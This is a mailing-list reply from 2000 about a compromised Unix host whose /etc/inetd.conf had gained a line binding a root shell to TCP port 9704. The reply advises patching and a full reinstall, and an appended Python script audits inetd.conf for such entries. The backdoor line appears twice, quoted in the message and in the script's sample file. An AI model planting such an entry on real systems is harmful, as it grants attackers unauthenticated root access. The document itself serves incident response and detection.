Security Incidents mailing list archives
Re: Possible widespread hole?
From: An Thi-Nguyen Le <viper () SRH1003 URH UIUC EDU>
Date: Sun, 27 Aug 2000 01:17:51 -0500
On Sat, Aug 26, 2000 at 06:07:32PM -0000, c_patin () HOTMAIL COM typed:
} I was snooping around my box yesterday, and noticed the
} following MAJOR hole listed at the bottom of
} /etc/inetd.conf:
} 9704 stream tcp nowait root /bin/sh sh -i

You were hacked.

} I have since closed the hole, and placed my box behind a
} hardware firewall to protect it. But the interesting thing
} is that I was reading Slashdot a little while ago and
} mentioned this in an article about security. And someone
} else had the same exact hole listed inside of his
} /etc/inetd.conf. Is this possibly some major hole in a
} package that we both installed, or did we just get hacked by
} the same person. Seems a little weird to just be
} coincidence. Any advice or ideas?

You were hacked. No doubts about it. Someone put that backdoor in your inetd.conf to make sure they could get back in, should you close the original hole they hacked through. In fact, they're probably running their own version of inetd and have hacked up ps and netstat so that you can't tell.

Whatever distribution you have, make sure your packages/programs/whatnot are all updated to non-vulnerable versions. A default RedHat install of any kind, for instance, is very, very wide open.

As your machine has been hacked, I would suggest a *complete* reinstall of your operating system, unless you feel like wondering whether your binaries are trojaned or not, which they probably are.

--
An Thi-Nguyen Le |Help me, I'm a prisoner in a Fortune cookie file!
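Added example, not part of the original message: a small Python audit that parses inetd.conf entries and flags any that attach a shell to a network socket, as the line quoted in the message above does. The shell list, function names and sample file are assumptions constructed for illustration.

```python
import os

# Shell names treated as suspicious when inetd hands them a socket (assumed list).
SHELLS = {"sh", "bash", "ash", "dash", "csh", "tcsh", "ksh", "zsh"}

def parse_entry(line):
    """Return the inetd.conf fields of one line, or None for blanks, comments, short lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 6:
        return None
    service, _sock, _proto, _wait, user, program = fields[:6]
    return {"service": service,
            "user": user.replace(":", ".").split(".")[0],  # drop optional group suffix
            "program": program, "argv": fields[6:]}

def audit(text):
    """Return a list of (line_number, service, reasons) for entries that spawn a shell."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        e = parse_entry(line)
        if e is None or e["program"] == "internal":
            continue
        # Check the server path and its argv, so a shell behind a wrapper such as tcpd is caught too.
        words = [e["program"]] + e["argv"]
        if any(os.path.basename(w) in SHELLS for w in words):
            reasons = ["shell attached to network socket"]
            if e["user"] == "root":
                reasons.append("runs as root")
            if e["service"].isdigit():
                reasons.append("numeric port instead of a named service")
            findings.append((n, e["service"], reasons))
    return findings

# Constructed sample: ordinary entries plus the line quoted in the message above.
SAMPLE = """\
# /etc/inetd.conf
ftp     stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet  stream tcp nowait root /usr/sbin/tcpd in.telnetd
echo    stream tcp nowait root internal
9704 stream tcp nowait root /bin/sh sh -i
"""

if __name__ == "__main__":
    for n, service, reasons in audit(SAMPLE):
        print(f"line {n}: service {service}: {'; '.join(reasons)}")
```

Because the message warns that inetd, ps and netstat on a compromised host may themselves be replaced, run a check like this against a copy of the file examined from trusted media, and treat a clean result as no proof that the machine is intact.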